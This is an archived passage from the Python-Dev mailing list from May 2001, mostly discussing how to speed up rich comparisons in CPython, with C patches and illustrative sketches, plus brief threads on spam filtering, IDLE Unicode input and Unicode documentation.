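The idea behind the string_richcompare patch below can be modelled in Python 3, using bytes to stand in for 8-bit PyStringObjects. This is an illustrative sketch, not a drop-in. The function names mirror the C ones but are otherwise hypothetical, the op argument uses strings instead of the Py_LT through Py_GE constants, and hash() here computes the hash when needed, whereas the C code only consults hashes that are already cached.

```python
def string_compare(a: bytes, b: bytes) -> int:
    """Three-way compare: -1, 0 or 1 (bytewise, then by length, like memcmp)."""
    for x, y in zip(a, b):
        if x != y:
            return -1 if x < y else 1
    return (len(a) > len(b)) - (len(a) < len(b))


def string_richcompare(a: bytes, b, op: str):
    """Model of the proposed C function; op is 'lt', 'le', 'eq', 'ne', 'gt' or 'ge'."""
    if not isinstance(b, bytes):
        return NotImplemented          # only `a` is guaranteed to be a string
    if op == "eq":
        # Cheap early exits: different lengths or hashes mean unequal strings.
        if len(a) != len(b):
            return False
        if hash(a) != hash(b):
            return False
    c = string_compare(a, b)
    results = {"lt": c < 0, "le": c <= 0, "eq": c == 0,
               "ne": c != 0, "gt": c > 0, "ge": c >= 0}
    return results.get(op, NotImplemented)  # unknown op: NotImplemented
```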

Please let me know what you think.

Martin

Index: stringobject.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/stringobject.c,v
retrieving revision 2.115
diff -u -r2.115 stringobject.c
--- stringobject.c	2001/05/10 00:32:57	2.115
+++ stringobject.c	2001/05/14 21:36:36
@@ -596,6 +596,51 @@
 	return (len_a < len_b) ? -1 : (len_a > len_b) ? 1 : 0;
 }
 
+/* In the signature, only a is guaranteed to be a PyStringObject.
+   However, as the first thing in the function, we check that b
+   is of that type also.  */
+
+static PyObject*
+string_richcompare(PyStringObject *a, PyStringObject *b, int op)
+{
+	int c;
+	PyObject *result;
+	if (!PyString_Check(b)) {
+		result = Py_NotImplemented;
+		goto out;
+	}
+	if (op == Py_EQ) {
+		if (a->ob_size != b->ob_size) {
+			result = Py_False;
+			goto out;
+		}
+#ifdef CACHE_HASH
+		if (a->ob_shash != b->ob_shash
+		    && a->ob_shash != -1 
+		    && b->ob_shash != -1) {
+			result = Py_False;
+			goto out;
+		}
+#endif
+	}
+	c = string_compare(a, b);
+	switch (op) {
+	case Py_LT: c = c <  0; break;
+	case Py_LE: c = c <= 0; break;
+	case Py_EQ: c = c == 0; break;
+	case Py_NE: c = c != 0; break;
+	case Py_GT: c = c >  0; break;
+	case Py_GE: c = c >= 0; break;
+	default:
+		result = Py_NotImplemented;
+		goto out;
+	}
+	result = c ? Py_True : Py_False;
+  out:
+	Py_INCREF(result);
+	return result;
+}
+
 static long
 string_hash(PyStringObject *a)
 {
@@ -2409,6 +2454,12 @@
 	&string_as_buffer,	/*tp_as_buffer*/
 	Py_TPFLAGS_DEFAULT,	/*tp_flags*/
 	0,		/*tp_doc*/
+	0,		/*tp_traverse*/
+	0,		/*tp_clear*/
+	(richcmpfunc)string_richcompare,	/*tp_richcompare*/
+	0,		/*tp_weaklistoffset*/
+	0,		/*tp_iter*/
+	0,		/*tp_iternext*/
 };
 
 void


From gstein at lyra.org  Tue May 15 00:17:56 2001
From: gstein at lyra.org (Greg Stein)
Date: Mon, 14 May 2001 15:17:56 -0700
Subject: [Python-Dev] Comparison speed
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHGEIFCAAA.tim@digicool.com>; from tim@digicool.com on Mon, May 14, 2001 at 04:12:44PM -0400
References: <BIEJKCLHCIOIHAGOKOLHGEIFCAAA.tim@digicool.com>
Message-ID: <20010514151755.P1374@lyra.org>

On Mon, May 14, 2001 at 04:12:44PM -0400, Tim Peters wrote:
>...
> Anybody care to take a stab at making the new richcmp and/or coerce code
> ugly again?
> 
> speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs  - tim

Euh... isn't Guido's preference for cleanliness over speed?

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From tim at digicool.com  Tue May 15 00:35:33 2001
From: tim at digicool.com (Tim Peters)
Date: Mon, 14 May 2001 18:35:33 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <20010514151755.P1374@lyra.org>
Message-ID: <BIEJKCLHCIOIHAGOKOLHOEIGCAAA.tim@digicool.com>

[Greg Stein]
> Euh... isn't Guido's preference for cleanliness over speed?

So do both.


From greg at cosc.canterbury.ac.nz  Tue May 15 03:42:49 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 15 May 2001 13:42:49 +1200 (NZST)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de>
Message-ID: <200105150142.NAA18195@s454.cosc.canterbury.ac.nz>

"Martin v. Loewis" <martin at loewis.home.cs.tu-berlin.de>:

> I also missed support for the
> relationship between identity and equality.

That would severely restrict the semantics that could be given
to the comparison operators by overloading them.
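Greg's point shows up in how CPython 3 eventually split the difference: the == operator calls the rich comparison and never assumes that identity implies equality, while container operations such as "in" and list equality check identity first (inside PyObject_RichCompareBool). A small sketch; the class name Never is hypothetical:

```python
class Never:
    """Overloads == so that it is False even when comparing with itself."""

    def __eq__(self, other):
        return False


x = Never()
nan = float("nan")

print(x == x)          # False: the operator honours the overloaded __eq__
print(nan == nan)      # False: IEEE 754 says NaN is unequal to itself
print(x in [x])        # True: membership tests check identity first
print([nan] == [nan])  # True: list equality compares items the same way
```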

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From guido at digicool.com  Tue May 15 04:40:33 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 14 May 2001 21:40:33 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Mon, 14 May 2001 15:17:56 MST."
             <20010514151755.P1374@lyra.org> 
References: <BIEJKCLHCIOIHAGOKOLHGEIFCAAA.tim@digicool.com>  
            <20010514151755.P1374@lyra.org> 
Message-ID: <200105150240.VAA26417@cj20424-a.reston1.va.home.com>

> > speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs  - tim
> 
> Euh... isn't Guido's preference for cleanliness over speed?

Yeah, Tim & I have developed a nice good-cop-bad-cop routine about
this. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Tue May 15 05:36:42 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 14 May 2001 23:36:42 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEDNKCAA.tim.one@home.com>

[Martin v. Loewis]
> ...
> When stepping through the code, I also missed support for the
> relationship between identity and equality. E.g. in
> PyObject_RichCompare, I'd expect
>
>   if (v == w) {
>      switch (op) {
>      case Py_EQ:case Py_LE:case Py_GE:
>         Py_INCREF(Py_True);
>         return Py_True;
>      case Py_NE:case Py_LT:case Py_GT:
>         Py_INCREF(Py_False);
>         return Py_False;
>      }
>   }
>
> That would not help in your case, of course. I don't even know how
> frequent comparing identical objects is in real life - but this is
> something that PyObject_Compare has that PyObject_RichCompare
> currently doesn't.

Guido insisted (with cause <wink>) on these four pairs as being equivalent:

    x <  y  iff  y >  x
    x <= y       y >= x
    x == y       y == x
    x != y       y != x

but beyond that, in the presence of rich comparisons, agreed not to make any
other assumptions about what those pixel-bags "mean".  In particular, there's
no implication that "x <= y" iff "x < y or x == y", or that "x < y" implies
"x != y", etc.

Applying that to the above leaves you with nothing but

   if (v == w && op == Py_EQ) /* then return Py_True */

Which is about all PyObject_Compare's

	if (v == w)
		return 0;

assumes too.  So I don't see much future in that.

[later, a patch to fill in the richcmp slot for strings]
> +static PyObject*
> +string_richcompare(PyStringObject *a, PyStringObject *b, int op)
> +{
> +	int c;
> +	PyObject *result;
> +	if (!PyString_Check(b)) {
> +		result = Py_NotImplemented;
> +		goto out;
> +	}
> +	if (op == Py_EQ) {
> +		if (a->ob_size != b->ob_size) {
> +			result = Py_False;
> +			goto out;
> +		}
> +#ifdef CACHE_HASH
> +		if (a->ob_shash != b->ob_shash
> +		    && a->ob_shash != -1
> +		    && b->ob_shash != -1) {
> +			result = Py_False;
> +			goto out;
> +		}
> +#endif
> +	}
> +	c = string_compare(a, b);
> +	switch (op) {
> +	case Py_LT: c = c <  0; break;
> +	case Py_LE: c = c <= 0; break;
> +	case Py_EQ: c = c == 0; break;
> +	case Py_NE: c = c != 0; break;
> +	case Py_GT: c = c >  0; break;
> +	case Py_GE: c = c >= 0; break;
> +	default:
> +		result = Py_NotImplemented;
> +		goto out;
> +	}
> +	result = c ? Py_True : Py_False;
> +  out:
> +	Py_INCREF(result);
> +	return result;
> +}

[and that yields about an 8% speedup in the "<" case]

That looks on the right track, but maybe at the wrong level:  why is it
necessary?  That is, the bulk of the "smarts" here in the switch stmt are
type-independent:  if there's no specific implementation of individual
comparisons, but there is a tp_compare, then the switch stmt applies verbatim
to *any* such type.  Do we have to fill in the richcmp slot for everything to
get Python to realize that?  I mean "just about everything", too:  while,
e.g., ceval special-cases "<" for ints, that doesn't do sorting or max or min
etc on ints a lick of good (they don't go thru the COMPARE_OP opcode then,
but thru the general comparison routines).

The "speed problem" appears to be:

+ COMPARE_OP calls cmp_outcome()
+   which calls PyObject_RichCompare()
+     which calls do_richcmp()
+       which calls try_rich_compare() (unsuccessfully now,
                                        successfully after your patch)
          which fails to find a richcmp slot on either operand (now)
          so says "not implemented"
+       then calls try_3way_to_rich_compare()
+         which calls try_3way_compare()
+            which finally calls the tp_compare slot
+            then runs exactly the same
                 switch (op) {
                 case Py_LT: c = c <  0; break;
                 case Py_LE: c = c <= 0; break;
                 case Py_EQ: c = c == 0; break;
                 case Py_NE: c = c != 0; break;
                 case Py_GT: c = c >  0; break;
                 case Py_GE: c = c >= 0; break;
                 }
                 result = c ? Py_True : Py_False;
             switch as your patch

and things unwind.  So we've got 7 function calls there, not even counting
calls to PyErr_Occurred() and PyObject_IsTrue(), all to find about 3 machine
instructions that actually do the compare <wink>.
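
The switch at the end of all these calls only turns a 3-way result into the answer for one of the six rich operators. Here is a standalone C sketch of that mapping, for illustration only. `CmpOp` and `three_way_to_rich` are hypothetical names standing in for Python's `Py_LT`..`Py_GE` constants and the switch above; the enum values are not Python's. The function returns a plain int rather than `Py_True`/`Py_False`.

```c
/* Hypothetical stand-ins for Py_LT .. Py_GE (values are illustrative). */
typedef enum { OP_LT, OP_LE, OP_EQ, OP_NE, OP_GT, OP_GE } CmpOp;

/* Map a 3-way result c (<0, 0, >0) onto the truth value of "v op w".
   Returns 1 or 0, or -1 for an unknown op (the C analogue of
   answering Py_NotImplemented). */
static int three_way_to_rich(CmpOp op, int c)
{
    switch (op) {
    case OP_LT: return c <  0;
    case OP_LE: return c <= 0;
    case OP_EQ: return c == 0;
    case OP_NE: return c != 0;
    case OP_GT: return c >  0;
    case OP_GE: return c >= 0;
    }
    return -1;
}
```

For example, `three_way_to_rich(OP_LE, -1)` yields 1. A negative 3-way result means "less than", which satisfies `<=`.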

You got an 8% speedup for one type by tricking the switch stmt into appearing
3 calls earlier.  What if the implementation were smarter, and did it for
*all* relevant types even a call or two before that?

I don't see any reason "in principle" that compares couldn't be much faster,
and via the usual gimmicks:  bigger, smarter functions that remember what
they've already determined so don't need to figure it out over and over
again, and fast paths to favor common cases at the expense of comparisons
from Mars.  One thing to note here:  the workhorse comparisons are "like
strings" in having no *logical* need for richcmps at all; and the objects for
which richcmps were introduced were numerical arrays, which can much better
afford a longer code path to *find* them (one matrix compare will trigger
many vanilla element compares anyway, so even for arrays it's much more
important that the *latter* be fast).  The code now is approximately
backwards in that respect (it takes gobs of work before we even *look* for a
cmp now -- indeed, if a type has both cmp and richcmp slots now, and we're
doing an explicit "cmp" compare, the code now tries to *simulate* cmp first
via a long sequence of richcmp calls!).
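
The ordering Tim argues for can be sketched with a toy type table. The idea is to run a few cheap pointer checks first, so that the common "same type, no rich slot, has tp_compare" case reaches tp_compare immediately. Everything here is hypothetical: `ToyType`, `ToyObject`, `toy_richcompare` and the -1 "not implemented" convention are all much simpler than CPython's real structures. The sketch shows only the dispatch order, not coercion or the special rules for instances.

```c
#include <stddef.h>

/* Hypothetical stand-ins for Py_LT .. Py_GE. */
typedef enum { OP_LT, OP_LE, OP_EQ, OP_NE, OP_GT, OP_GE } CmpOp;

typedef struct ToyObject ToyObject;

/* 3-way slot returns <0, 0, >0.  Rich slot returns 1/0, or -1 for
   "not implemented". */
typedef int (*cmp3_fn)(const ToyObject *, const ToyObject *);
typedef int (*richcmp_fn)(const ToyObject *, const ToyObject *, CmpOp);

typedef struct {
    cmp3_fn tp_compare;
    richcmp_fn tp_richcompare;
} ToyType;

struct ToyObject {
    const ToyType *type;
    long value;
};

static int outcome(CmpOp op, int c)
{
    switch (op) {
    case OP_LT: return c <  0;
    case OP_LE: return c <= 0;
    case OP_EQ: return c == 0;
    case OP_NE: return c != 0;
    case OP_GT: return c >  0;
    case OP_GE: return c >= 0;
    }
    return -1;
}

/* Reflected operator, used when asking the right operand instead. */
static CmpOp swapped(CmpOp op)
{
    switch (op) {
    case OP_LT: return OP_GT;
    case OP_LE: return OP_GE;
    case OP_GT: return OP_LT;
    case OP_GE: return OP_LE;
    default:    return op;          /* EQ and NE are symmetric */
    }
}

static int toy_richcompare(const ToyObject *v, const ToyObject *w, CmpOp op)
{
    const ToyType *t = v->type;
    int r;

    /* Fast path: three pointer checks, then straight to tp_compare. */
    if (t == w->type && t->tp_richcompare == NULL && t->tp_compare != NULL)
        return outcome(op, t->tp_compare(v, w));

    /* Slow path: rich slots are still tried first, as required. */
    if (t->tp_richcompare != NULL && (r = t->tp_richcompare(v, w, op)) >= 0)
        return r;
    if (w->type->tp_richcompare != NULL
        && (r = w->type->tp_richcompare(w, v, swapped(op))) >= 0)
        return r;
    if (t == w->type && t->tp_compare != NULL)
        return outcome(op, t->tp_compare(v, w));
    return -1;                      /* nothing applies */
}

/* A toy "int" type with only a 3-way slot. */
static int long_compare(const ToyObject *a, const ToyObject *b)
{
    return (a->value > b->value) - (a->value < b->value);
}
static const ToyType ToyInt = { long_compare, NULL };
```

The fast path fires only when the type has no rich slot at all. It therefore never changes which function decides the outcome, which is the semantic constraint Martin raises later in the thread.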

I don't have time to uglify this code, but Python would benefit from it.

and-no-matter-what-guido-may-say<wink>-ly y'rs  - tim


From tim.one at home.com  Tue May 15 05:50:00 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 14 May 2001 23:50:00 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
In-Reply-To: <E14zQ63-0002ZA-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEDOKCAA.tim.one@home.com>

[Guido]
> Index: spam.c
> ...

Congratulations!  "My other" ISP (MSN) just started tagging suspected spam
with "spam" in the subject line, and my mail reader moves that to a special
spam folder upon delivery.  So far this is the one and only incoming email
it's moved.  Many solicitations to help foreign nationals move large sums of
money out of their country have gotten through, along with a number of
intriguing promises that I can easily increase the size of my penis -- like I
have any need for either of those <wink>.

reads-every-spam-he-gets-top-to-bottom-ly y'rs  - tim


From esr at thyrsus.com  Tue May 15 05:53:38 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Mon, 14 May 2001 23:53:38 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEDOKCAA.tim.one@home.com>; from tim.one@home.com on Mon, May 14, 2001 at 11:50:00PM -0400
References: <E14zQ63-0002ZA-00@usw-pr-cvs1.sourceforge.net> <LNBBLJKPBEHFEDALKOLCEEDOKCAA.tim.one@home.com>
Message-ID: <20010514235338.C663@thyrsus.com>

Tim Peters <tim.one at home.com>:
>              Many solicitations to help foreign nationals move large sums of
> money out of their country have gotten through, along with a number of
> intriguing promises that I can easily increase the size of my penis -- like I
> have any need for either of those <wink>.

What we should truly fear is the prospect that you might increase the size
of your <wink>.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

"The state calls its own violence `law', but that of the individual `crime'"
	-- Max Stirner


From uche.ogbuji at fourthought.com  Tue May 15 06:26:31 2001
From: uche.ogbuji at fourthought.com (Uche Ogbuji)
Date: Mon, 14 May 2001 22:26:31 -0600
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules 
 spam.c,1.1.2.3,1.1.2.4
In-Reply-To: Message from "Tim Peters" <tim.one@home.com> 
   of "Mon, 14 May 2001 23:50:00 EDT." <LNBBLJKPBEHFEDALKOLCEEDOKCAA.tim.one@home.com> 
Message-ID: <200105150426.f4F4QVx01531@localhost.local>

> [Guido]
> > Index: spam.c
> > ...
> 
> Congratulations!  "My other" ISP (MSN) just started tagging suspected spam
> with "spam" in the subject line, and my mail reader moves that to a special
> spam folder upon delivery.  So far this is the one and only incoming email
> it's moved.  Many solicitations to help foreign nationals move large sums of
> money out of their country have gotten through [...]

I thought I was the only one getting all these silly Nigerian scam spams.  I 
figured maybe they saw my name and decided to test on me (though they might 
more cleverly have figured that a fellow Nigerian would be wise to the game).

However, with the (sloppily) bogus headers I've always found on those things, 
I'm surprised your ISP couldn't sniff them out.

Not that it matters.  The Eastern Nigerian proverb gets it right.

"Once hunters learn to shoot without missing, birds will learn to fly without 
resting".


-- 
Uche Ogbuji                               Principal Consultant
uche.ogbuji at fourthought.com               +1 303 583 9900 x 101
Fourthought, Inc.                         http://Fourthought.com 
4735 East Walnut St, Ste. C, Boulder, CO 80301-2537, USA
Software-engineering, knowledge-management, XML, CORBA, Linux, Python


From tim.one at home.com  Tue May 15 08:28:34 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 15 May 2001 02:28:34 -0400
Subject: [Python-Dev] IDLE and non-ASCII characters
In-Reply-To: <200105141141.NAA22376@pandora.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEEEKCAA.tim.one@home.com>

[Guido]
> Postscript: using cut and paste, I *can* enter "s='äö'" in IDLE at the
> Python prompt, both on Linux and on Windows 98.  It prints as
> '\xe4\xf6' on both systems.  What changed?

[Martin]
> Perhaps the Tcl version? That sounds like the issue that Marc talked
> about: Tk behaves differently when text is entered programmatically
> (and perhaps through cut-n-paste), as compared to text entered through
> the keyboard. Using cut-n-paste with Tk 8.3.1, CVS python, X11R6.3 on
> Solaris 8 still gives me the UnicodeError.

I don't know which version of Python Guido used.  I tried cut-&-paste of

    s='äö'

from his email into the distributed 2.1 IDLE under Win98, and got

    UnicodeError: ASCII encoding error: ordinal not in range(128)

Tk appears to interfere with using the usual Windows ALT+0nnn method of
entering funny characters, so unsure what happens then -- but for me it
either works fine or does something insane (moves the cursor to the left
margin, brings up an IDLE dialog box, etc).

If I open the system Character Map utility and copy-&-paste using *that*, I
can enter all sorts of stuff without problem:

>>> s = "àáâãäåæçèéêëìíîïðñòòóôõö÷øùúûüýþÿ"
>>> s
'\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef
\xf0\xf1\xf2\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff'
>>>

So not all clipboard entries are created equal.

Another clue:  if I paste the s='äö' snippet from Guido's email into a file
opened with Notepad, then immediately copy it again from the Notepad doc,
then paste that into Idle, again no problem:

>>> s='äö'
>>> s
'\xe4\xf6'
>>>

Using a clipboard diagnostic tool I don't understand, when I copy from
Notepad these data formats are in the system clipboard:

    TEXT
    LOCALE
    OEMTEXT

But when I copy from Guido's email under Outlook 2000, it's

    DataObject
    Rich Text Format
    Rich Text Format Without Objects
    RTF as Text
    TEXT
    UNICODETEXT
    Ole Private Data
    LOCALE
    OEMTEXT

Under Character Map, it's

    Rich Text Format
    TEXT
    LOCALE
    OEMTEXT

So perhaps it's not the version of Tk but the source of the data, and that Tk
grabs an unfortunate data format (when present) from the clipboard in
preference to a fortunate one.

the-clipboard-is-a-complex-beast-ly y'rs  - tim


From martin at loewis.home.cs.tu-berlin.de  Tue May 15 08:44:23 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Tue, 15 May 2001 08:44:23 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEDNKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCCEDNKCAA.tim.one@home.com>
Message-ID: <200105150644.f4F6iN501475@mira.informatik.hu-berlin.de>

> Applying that to the above leaves you with nothing but
> 
>    if (v == w && op == Py_EQ) /* then return Py_True */
> 
> [...] So I don't see much future in that.

Is this really exactly what Python would guarantee? I'm surprised that
x==x would always be true, but x!=x might be true also. In a type where
x!=x holds, wouldn't people also want to say that x==x might fail? IOW,
I had expected that you'd reduced it to

  if (v == w && op == Py_EQ) /* then return Py_True */
  if (v == w && op == Py_NE) /* then return Py_False */

The one application where this may help is list_contains, in
particular when searching a list of interned strings.
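
Martin's list_contains case is easy to picture. If the list holds interned strings and the probe is interned too, a pointer test finds the match before any characters are compared. Here is a minimal sketch over plain C strings, in which pointer identity stands in for interning. `contains_interned` is a hypothetical name. The sketch falls back to strcmp, so probes that are not interned still work.

```c
#include <stddef.h>
#include <string.h>

/* Return 1 if key occurs in items[0..n), else 0.  Pointer identity is
   checked first: for interned strings a hit costs one address
   comparison and no character reads. */
static int contains_interned(const char *const *items, size_t n, const char *key)
{
    size_t i;
    for (i = 0; i < n; i++) {
        if (items[i] == key)
            return 1;                   /* same object: equal */
        if (strcmp(items[i], key) == 0)
            return 1;                   /* different object, equal bytes */
    }
    return 0;
}
```

The identity test is safe here because a string always equals itself. Tim's NaN example later in the thread shows why the same test cannot be applied blindly to every type.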

> You got an 8% speedup for one type by tricking the switch stmt into
> appearing 3 calls earlier.  What if the implementation were smarter,
> and did it for *all* relevant types even a call or two before that?

Please have a look at the patch below. Since I have done a CVS update since
yesterday, I had to readjust the baseline results:

0.790
0.780
0.770
0.780
0.780
0.790
0.780
0.790
0.790
0.790

The patch moves the "equal types, supporting cmp" case somewhat
earlier, to just after the attempt to do richcompare. Now I get

0.760
0.770
0.750
0.770
0.750
0.750
0.760
0.760
0.760
0.760

So while there is some saving, this is not as good as implementing
richcompare.

> I don't see any reason "in principle" that compares couldn't be much
> faster, and via the usual gimmicks: bigger, smarter functions that
> remember what they've already determined so don't need to figure it
> out over and over again, and fast paths to favor common cases at the
> expense of comparisons from Mars.

I agree "in principle" :-) However, you cannot move the case "equal
types, implementing tp_compare" before the case "one of them
implements tp_richcompare" without changing the semantics. 

The semantic difference lies in what you do when a type has both richcmp
and oldcomp; Python clearly mandates using richcmp. In case this is not
obvious (it wasn't to me): UserList will complain about using the
deprecated __cmp__, and dictionaries will iterate over their elements
differently.

Given that richcomp has to be tried first, this patch does the "common
case" at the earliest possible time, and with no overhead, except for
the PyErr_Occurred call.

So yes, compares can be much faster, BUT YOU HAVE TO SUPPORT
TP_RICHCOMPARE (sorry for shouting). If you think the extra work for
type implementors is not acceptable, we can offer a convenience
function that everybody implementing tp_compare can put into
tp_richcompare. For strings, I would still special-case
tp_richcompare: when tracing calls to string_richcompare, I found that
most calls with Py_EQ can be decided by checking that the string
lengths are not equal. This is all "bigger, faster functions" put to
work.

Regards,
Martin

Index: object.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/object.c,v
retrieving revision 2.131
diff -u -r2.131 object.c
--- object.c	2001/05/11 03:36:45	2.131
+++ object.c	2001/05/15 06:16:53
@@ -477,16 +477,6 @@
 	if (PyInstance_Check(w))
 		return (*w->ob_type->tp_compare)(v, w);
 
-	/* If the types are equal, don't bother with coercions etc. */
-	if (v->ob_type == w->ob_type) {
-		if ((f = v->ob_type->tp_compare) == NULL)
-			return 2;
-		c = (*f)(v, w);
-		if (PyErr_Occurred())
-			return -2;
-		return c < 0 ? -1 : c > 0 ? 1 : 0;
-	}
-
 	/* Try coercion; if it fails, give up */
 	c = PyNumber_CoerceEx(&v, &w);
 	if (c < 0)
@@ -590,15 +580,21 @@
    -1 if v < w;
     0 if v == w;
     1 if v > w;
+   If the object implements a tp_compare function, it returns
+   whatever this function returns (whether with an exception or not).
 */
 static int
 do_cmp(PyObject *v, PyObject *w)
 {
 	int c;
+	cmpfunc f;
 
 	c = try_rich_to_3way_compare(v, w);
 	if (c < 2)
 		return c;
+	if (v->ob_type == w->ob_type
+	    && (f = v->ob_type->tp_compare) != NULL)
+		return (*f)(v, w);
 	c = try_3way_compare(v, w);
 	if (c < 2)
 		return c;
@@ -760,16 +756,9 @@
 }
 
 static PyObject *
-try_3way_to_rich_compare(PyObject *v, PyObject *w, int op)
+convert_3way_to_object(int op, int c)
 {
-	int c;
 	PyObject *result;
-
-	c = try_3way_compare(v, w);
-	if (c >= 2)
-		c = default_3way_compare(v, w);
-	if (c <= -2)
-		return NULL;
 	switch (op) {
 	case Py_LT: c = c <  0; break;
 	case Py_LE: c = c <= 0; break;
@@ -782,16 +771,46 @@
 	Py_INCREF(result);
 	return result;
 }
+	
 
 static PyObject *
+try_3way_to_rich_compare(PyObject *v, PyObject *w, int op)
+{
+	int c;
+
+	c = try_3way_compare(v, w);
+	if (c >= 2)
+		c = default_3way_compare(v, w);
+	if (c <= -2)
+		return NULL;
+	return convert_3way_to_object(op, c);
+}
+
+static PyObject *
 do_richcmp(PyObject *v, PyObject *w, int op)
 {
 	PyObject *res;
+	cmpfunc f;
 
+
 	res = try_rich_compare(v, w, op);
 	if (res != Py_NotImplemented)
 		return res;
 	Py_DECREF(res);
+
+	/* If the types are equal, don't bother with coercions etc. 
+	   Instances are special-cased in try_3way_compare, since
+	   a result of 2 does *not* mean one value being greater
+	   than the other. */
+	if (v->ob_type == w->ob_type
+	    && !PyInstance_Check(v)
+	    && (f = v->ob_type->tp_compare) != NULL) {
+		int c;
+		c = (*f)(v, w);
+		if (PyErr_Occurred())
+			return NULL;
+		return convert_3way_to_object(op, c);
+	}
 
 	return try_3way_to_rich_compare(v, w, op);
 }


From tim.one at home.com  Tue May 15 09:33:06 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 15 May 2001 03:33:06 -0400
Subject: [Python-Dev] Unicode docs
In-Reply-To: <3AFFA23F.248517E3@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEEHKCAA.tim.one@home.com>

I don't know that the Unicode docs need massive work, but the docs that are
there simply don't answer the technical questions people have:  they're too
thin.

Let's keep it simple.  Contrast the Library manual's:

    unicode(string[, encoding[, errors]])
    Decodes string using the codec for encoding. Error handling is
    done according to errors. The default behavior is to decode UTF-8
    in strict mode, meaning that encoding errors raise ValueError. See
    also the codecs module.

with Andrew's description (from http://www.amk.ca/python/2.0/):

    unicode(string [, encoding] [, errors])
    Creates a Unicode string from an 8-bit string. encoding is a
    string naming the encoding to use. The errors parameter specifies
    the treatment of characters that are invalid for the current
    encoding; passing 'strict' as the value causes an exception
    to be raised on any encoding error, while 'ignore' causes errors
    to be silently ignored and 'replace' uses U+FFFD, the official
    replacement character, in case of any problems.

The latter addresses several *fundamental* questions untouched by the former,
like what are the datatypes of the arguments and the result, what values does
errors accept, and what do they mean?  The first blurb answers some more,
like what's the default encoding, and which exception is raised?  Neither is
complete on its own, but the reference manual should have a complete answer
to all such questions.  It doesn't have to go on at great length.

A round-trip example would be invaluable.
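
The kind of round trip Tim asks for can also be shown outside Python. The C sketch below illustrates the idea; it is not Python's codec machinery. It decodes Latin-1 bytes into UTF-8 and encodes them back. `latin1_to_utf8` and `utf8_to_latin1` are hypothetical helper names. The reverse direction fails on anything above U+00FF, which is roughly what a 'strict' Latin-1 encoder has to do.

```c
#include <stddef.h>

/* Latin-1 byte b is code point U+00bb; write its UTF-8 form.
   out needs room for 2*n bytes.  Returns the number of bytes written. */
static size_t latin1_to_utf8(const unsigned char *in, size_t n, unsigned char *out)
{
    size_t i, j = 0;
    for (i = 0; i < n; i++) {
        unsigned char b = in[i];
        if (b < 0x80) {
            out[j++] = b;                              /* ASCII: 1 byte */
        } else {
            out[j++] = (unsigned char)(0xC0 | (b >> 6));   /* 0xC2 or 0xC3 */
            out[j++] = (unsigned char)(0x80 | (b & 0x3F));
        }
    }
    return j;
}

/* Inverse: returns bytes written, or (size_t)-1 if the input contains a
   code point above U+00FF or malformed UTF-8 (the 'strict' outcome). */
static size_t utf8_to_latin1(const unsigned char *in, size_t n, unsigned char *out)
{
    size_t i = 0, j = 0;
    while (i < n) {
        unsigned char b = in[i];
        if (b < 0x80) {
            out[j++] = b;
            i += 1;
        } else if ((b == 0xC2 || b == 0xC3) && i + 1 < n
                   && (in[i + 1] & 0xC0) == 0x80) {
            out[j++] = (unsigned char)(((b & 0x1F) << 6) | (in[i + 1] & 0x3F));
            i += 2;
        } else {
            return (size_t)-1;
        }
    }
    return j;
}
```

Encoding "abcäöü" produces 9 UTF-8 bytes, and decoding them gives back the original 6 Latin-1 bytes unchanged.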

If Fred wanted to incorporate a brief overview too, a light rework of
Andrew/Moshe's writeup would be an excellent start.


From tim.one at home.com  Tue May 15 09:47:16 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 15 May 2001 03:47:16 -0400
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
In-Reply-To: <3AFF9F1B.A1CDD617@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEEJKCAA.tim.one@home.com>

[M.-A. Lemburg]
> The problem is: which part would raise the exception -- the
> encoder or the decoder ?

Since I don't yet use any of this stuff for real, I have no idea:  seems
mostly a question of pragmatics, and I don't have any feel for how cp875
users would view it.

> Here are some more options:
>
